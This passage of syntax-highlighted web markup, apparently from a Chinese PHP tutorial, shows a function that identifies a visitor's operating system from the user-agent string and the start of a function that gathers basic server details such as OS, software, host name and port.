italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 6.2</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 8</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 10.0</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 10</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span><span style="color: #676E95; font-style: italic">#添加win10判断 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 5.1</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows XP</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 5</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 2000</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows NT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">32</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 32</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">linux</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Linux</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">unix</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Unix</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">sun</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">os</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SunOS</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">ibm</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">os</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">IBM OS/2</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">Mac</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">PC</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Macintosh</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">PowerPC</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">PowerPC</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">AIX</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">AIX</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">HPUX</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HPUX</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">NetBSD</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">NetBSD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">BSD</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">BSD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">OSF1</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">OSF1</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">IRIX</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">IRIX</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">FreeBSD</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">FreeBSD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">teleport</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">teleport</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">flashget</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">flashget</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">webzip</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">webzip</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">offline</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">offline</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">未知操作系统</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h4 id="获取服务器基本信息"><a href="#获取服务器基本信息" class="headerlink" title="获取服务器基本信息"></a>获取服务器基本信息</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">public</span><span style="color: #BABED8"> </span><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">osinfo</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">info </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">array</span><span style="color: #89DDFF">(</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">操作系统</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8">PHP_OS</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">运行环境</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">SERVER_SOFTWARE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">主机名</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_NAME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">WEB服务端口</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"></span><span style="color: #89DDFF">=></span><span style="color: #BABED8"></span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SERVER_PORT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">],</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: 